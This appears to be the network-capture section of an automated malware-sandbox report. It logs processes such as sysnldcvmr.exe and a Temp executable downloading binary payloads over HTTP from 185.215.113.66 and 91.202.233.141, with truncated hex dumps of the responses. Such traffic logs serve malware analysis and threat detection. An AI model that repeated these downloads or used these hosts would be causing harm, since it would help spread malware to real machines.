Dec 5, 2024 17:32:15.419224977 CET	1236	IN	Data Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1 Data Ascii: f3w\|R!hX~beb\|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
Dec 5, 2024 17:32:15.419236898 CET	248	IN	Data Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c Data Ascii: S#2j1!DR<_'Uruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-dCZ`p7(uiHd=)d3@<
Dec 5, 2024 17:32:15.421212912 CET	1236	IN	Data Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2 Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
Dec 5, 2024 17:32:15.421241045 CET	1236	IN	Data Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f Data Ascii: ZQg:F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5a.v"[Fu#!D*
Dec 5, 2024 17:32:15.535382032 CET	1236	IN	Data Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52 Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)\|Sm*7Q%gDUw'P(+P{lC\q"b
Dec 5, 2024 17:32:21.349339962 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:21.799026012 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:21 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49819	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:23.407970905 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:24.736416101 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:24 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
Dec 5, 2024 17:32:24.736452103 CET	1236	IN	Data Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d Data Ascii: 1a@ #o;R`_\|#\|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz\|d
Dec 5, 2024 17:32:24.736464977 CET	1236	IN	Data Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b Data Ascii: a;^;3\|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
Dec 5, 2024 17:32:24.736531019 CET	1236	IN	Data Raw: b3 14 96 cb 1c 0a 64 65 9f 17 1d 52 f9 ae 09 c2 59 f9 97 5b 06 44 1f 60 d5 dc 83 2e 98 cf df f1 08 5d 1d 36 10 63 69 37 f3 11 47 73 c1 1c ec 75 9f a3 5e 11 a4 d3 cd 83 6a 32 cd da 5f a2 80 b4 0b 03 1e 6e e5 80 35 9f 8f 49 86 b6 da c7 ab 4e 6a ba Data Ascii: deRY[D`.]6ci7Gsu^j2_n5INj.`/#(W{[uhRfdy6z[$PzqmAEH]6t:FvqlDFT\|JG9_,l{!G6eMqP_d
Dec 5, 2024 17:32:24.736545086 CET	1236	IN	Data Raw: 6d 0d 07 a8 a1 69 a5 5a 9f 67 bb a2 b3 a3 1a 7b df b0 97 3e 9f 20 d8 e2 0f 63 0c 38 c6 ce 9e b0 77 92 c6 65 37 7a e5 0d a5 58 6c cb b5 27 81 75 a6 c5 28 35 e5 3c c3 09 59 f7 dd 4d 9e 8b b5 64 6b e3 1f 4d ed 5b 6c 04 4e ae 54 c3 03 55 4a 4f 76 43 Data Ascii: miZg{> c8we7zXl'u(5<YMdkM[lNTUJOvCS\u#~z;}#+!%vk@E}rOFmbiVo(s<^]G,:\iLnc\.+#sE@-# ltx5=oPZr
Dec 5, 2024 17:32:24.736557007 CET	1236	IN	Data Raw: 84 db 0e 73 27 8c 8e 32 19 7c 5f 7e 88 3f 77 9c 60 1b 86 3c 63 9f 5e d3 41 d2 d9 8a 4f 95 24 1c 1e f6 60 45 bf 19 d6 10 06 4b 4f 78 8f 76 05 5c 04 08 0b 84 be cf a5 90 5a 2f 4a 86 44 4c 3e 8e f6 2d dc 92 b9 a0 5e 28 d2 50 08 ce 41 d5 da a6 0e 57 Data Ascii: s'2\|_~?w`<c^AO$`EKOxv\Z/JDL>-^(PAWS$0P"GgyUGdCj]}[`xT9/\^=}%1!lix7pwcdU"5glxDrcyzn#uZxT{4v
Dec 5, 2024 17:32:24.736569881 CET	1236	IN	Data Raw: eb 8d 97 ab 4b 3a 53 7e da 7f 04 57 bf 19 a7 d6 f3 c3 06 10 b1 09 16 23 60 a7 ba 91 3f 02 de a7 97 e6 74 56 05 8f f9 4f 69 36 6f 76 dd a5 19 ef 75 eb ae 69 3c 09 59 9b 3f 79 da 82 48 6d 9c d2 ba 97 99 83 d8 37 62 31 82 6a 57 5c 5e 54 5f 48 89 00 Data Ascii: K:S~W#`?tVOi6ovui<Y?yHm7b1jW\^T_H#^fdD`[wj(MEmClltf99az(2>&n+owX0}n)y]EfiH7,>H79;~#4{`M1H<%>^At
Dec 5, 2024 17:32:24.736617088 CET	1236	IN	Data Raw: 16 25 ae 88 64 71 0b 50 6d 5d 8c 63 a3 e9 91 25 1d aa 31 d9 aa 7a 7d 84 26 a2 95 76 45 23 54 e6 a5 ba c8 c4 c2 4f 36 d6 c9 45 2b a7 d0 b2 a6 b1 75 c4 a8 54 7d 9f da cf 6a dc 88 94 37 ff 38 1e b0 06 49 37 ed 2c 1a c5 bb 71 c3 2f 47 5a 84 9f a4 f8 Data Ascii: %dqPm]c%1z}&vE#TO6E+uT}j78I7,q/GZ`cr]c!E`qs7`.fg%yT_<Zi4V<NyDm}_Bh_3kSRUH\|[E("[(uOtR<HcbJ&xF'KH
Dec 5, 2024 17:32:24.736630917 CET	1236	IN	Data Raw: 20 a4 13 18 ef 97 b9 85 4c 87 0c 5e 0c 1a 67 ca 13 4f 06 00 22 3d e6 f5 8f b0 55 76 0f 6c 15 ae 5c 5c 57 5a 79 77 7d ed d9 96 48 e9 f1 39 38 66 67 ea f9 af 95 18 f7 5c 22 93 11 dc 4d 2d 2f 2c 66 ab 39 92 61 3d 01 75 ee 0b cb 04 d5 8c dd 42 4d 1a Data Ascii: L^gO"=Uvl\\WZyw}H98fg\"M-/,f9a=uBMd"=M,Lo1{@QXR:d=GMw(ZD}E?5GN2KsZf#_qGm8Y61Hc!nb&HskiT1L2Y\Z?w(Vg6FA.;r
Dec 5, 2024 17:32:24.736643076 CET	1236	IN	Data Raw: 82 ef 29 d7 83 57 67 67 d1 c1 72 17 81 4d c2 10 51 46 37 9f df 5d 5d c6 a6 e7 87 60 e1 21 98 20 70 0f 63 fc d6 a6 7f 00 d3 65 c6 9b f3 c6 71 fe 78 ec fb 00 0c 86 a7 25 8a 00 32 3a a6 1c 29 b2 89 d8 ac 37 4d 95 04 59 5c b1 46 e3 b1 2f aa d9 cc 11 Data Ascii: )WggrMQF7]]`! pceqx%2:)7MY\F/P!&mrDcbn0NWcD83Dkv\sLJ/ aU`\|RyzDyc#_T(^V71YtMazp{P^:w(ofe
Dec 5, 2024 17:32:24.856443882 CET	1236	IN	Data Raw: 7e 8d a9 13 7b ea ce ce 59 86 af da ff 6b ca 38 44 bc 32 9a 91 8c 1f 94 36 29 36 c7 1c d6 f8 74 96 7a 5a 96 7d 3b 68 4f 2c de 0e 1a c6 22 83 3c a8 7a 3e 73 40 5f 32 00 76 0a 3f 01 87 54 76 8c 6b 29 ff d0 63 38 3c 45 64 9f db 8f 2c 21 c7 a9 3d 40 Data Ascii: ~{Yk8D26)6tzZ};hO,"<z>s@_2v?Tvk)c8<Ed,!=@bV;?{!CxR\~DoP15"Na+=\|]K%=s74O-ADfix)I(LH9[`>n>Hr5X`hD!Or5REpHt 9CQ')}A
Dec 5, 2024 17:32:30.487669945 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:30.926646948 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:30 GMT Content-Type: application/octet-stream Content-Length: 66816 Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT Connection: keep-alive ETag: "6751d253-10500" Accept-Ranges: bytes Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED] Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA\|?g}o k?Z5nD8E%\|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b\|S,Z?9C&]:jE>90F]qj(>rXn{v^e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49833	91.202.233.141	80	5420	C:\Users\user\AppData\Local\Temp\1657630034.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:29.579744101 CET	178	OUT	GET /IBSTSWSONL HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:32:30.897249937 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:30 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49838	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:32.141679049 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:33.492355108 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:33 GMT Content-Type: application/octet-stream Content-Length: 66816 Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT Connection: keep-alive ETag: "6751d253-10500" Accept-Ranges: bytes Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED] Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA\|?g}o k?Z5nD8E%\|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b\|S,Z?9C&]:jE>90F]qj(>rXn{v^e
Dec 5, 2024 17:32:33.492400885 CET	124	IN	Data Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr
Dec 5, 2024 17:32:33.495179892 CET	1236	IN	Data Raw: 10 0b bc 33 cf fe 47 98 e1 3c 64 34 4c 56 24 40 b9 4d 3c 17 10 a2 d8 0b 9f b2 d8 5f cc ab fa 64 aa 9c 54 88 a4 ff 1a 7c 2c 67 cf e3 e0 2b af cb 15 dc 9b a2 89 55 5b 16 ce 7a 68 a8 5e 16 50 d1 49 01 5f c7 13 c4 77 f4 51 99 76 d4 56 9d a9 73 ae 15 Data Ascii: 3G<d4LV$@M<_dT\|,g+U[zh^PI_wQvVs\|nXaGIr30pZYz]>g13TXX5\Zb@9Ptev@r'r=f:s,84n@E@ uHkL>Dt1
Dec 5, 2024 17:32:33.495242119 CET	1236	IN	Data Raw: d6 d7 c1 91 d0 16 35 39 77 ae 82 49 77 07 87 b0 fe 68 36 42 71 be 4e 2c 6b c5 6b 32 17 90 0c 01 67 95 20 af 14 e6 c5 d8 bb 6c 36 91 6d d0 79 35 10 91 b1 d6 1e ab 2d 36 37 1e f4 c8 88 10 8d 5a 83 93 da c5 27 c1 fe 06 f1 07 bc 4f e2 b2 2b e7 d4 b4 Data Ascii: 59wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-@+RY4jLn$"p$on=POF'H:8{r(vW8^z`'r4Mb&}lF~5/
Dec 5, 2024 17:32:33.495263100 CET	1236	IN	Data Raw: bc 0a 03 56 b1 f9 76 e2 09 c5 78 f1 7f 0e 64 6c 58 5c d9 40 f1 30 be 6c da d1 c9 aa 45 fb 15 99 c0 9e 82 9e e0 7f 0b cc 42 e3 17 04 35 60 46 9f 17 d4 a6 85 8b 4d 63 8c b5 2a 43 73 bd 4f 42 aa e1 eb a5 ff d0 05 d3 73 30 ce ed ed 1f 18 60 3a a2 98 Data Ascii: VvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1G3Ml"b5r.,I<JR?8OTv-G9.pThB@r.ptk0Kw8\|D-rf9::oZAz
Dec 5, 2024 17:32:33.495351076 CET	1236	IN	Data Raw: 32 89 e7 a5 4b c6 7f 90 31 56 b0 d9 e0 9f 13 9f 57 5b 75 92 5b 4c a1 e3 ea 64 8d 8a a4 54 ad fb 93 91 ac 93 9e e7 8d fb b5 71 14 9a 77 1b 9d 53 4f 95 f9 28 40 30 dc 69 5b 1b 8e e6 33 a4 cb 5a 55 5a fb 67 bc 92 2b 6f 36 a0 af 13 45 b7 c6 10 22 bc Data Ascii: 2K1VW[u[LdTqwSO(@0i[3ZUZg+o6E"Z[oxd31oH"#$%7H_B=z4Fz@x_WnB'/*Ra3V"\|Q {\xCgglBsusy?t1W`tROX
Dec 5, 2024 17:32:33.495366096 CET	496	IN	Data Raw: bb 77 c5 27 6b 94 b9 ea 87 88 d6 69 8a ad 6f e1 1a 79 67 e4 e6 3c 5e 82 1c 94 f0 d1 ff e9 20 b8 92 fc 8c c8 46 54 15 06 41 49 f4 39 bd f5 33 de 7c 74 4b 85 8e 52 a3 4e 1c b0 c9 89 d7 17 32 9f d0 20 26 0b de d8 f9 3c a2 52 5d b6 0f 95 97 de 47 ed Data Ascii: w'kioyg<^ FTAI93\|tKRN2 &<R]G{\|lL?Mg;~Idz7?:`XLN[:n\|#]us0Wp+HH0=Px/lR6^wqej{P-c&o\|"p)}h>H}exDyxNbn
Dec 5, 2024 17:32:33.495760918 CET	1236	IN	Data Raw: 7d 28 67 b2 35 31 cd e8 49 09 2a a8 7f 40 bb 75 b4 6e ad fe 3c 0a 84 26 89 76 15 12 72 b4 04 2c 66 31 e4 74 8f 5e d0 a5 c4 84 7d 8f 94 bb 11 ec 05 d7 49 cc bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46 Data Ascii: }(g51I@un<&vr,f1t^}I9gJ]zU;/hS+ \FQ'vo-,1T]'Y5\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^
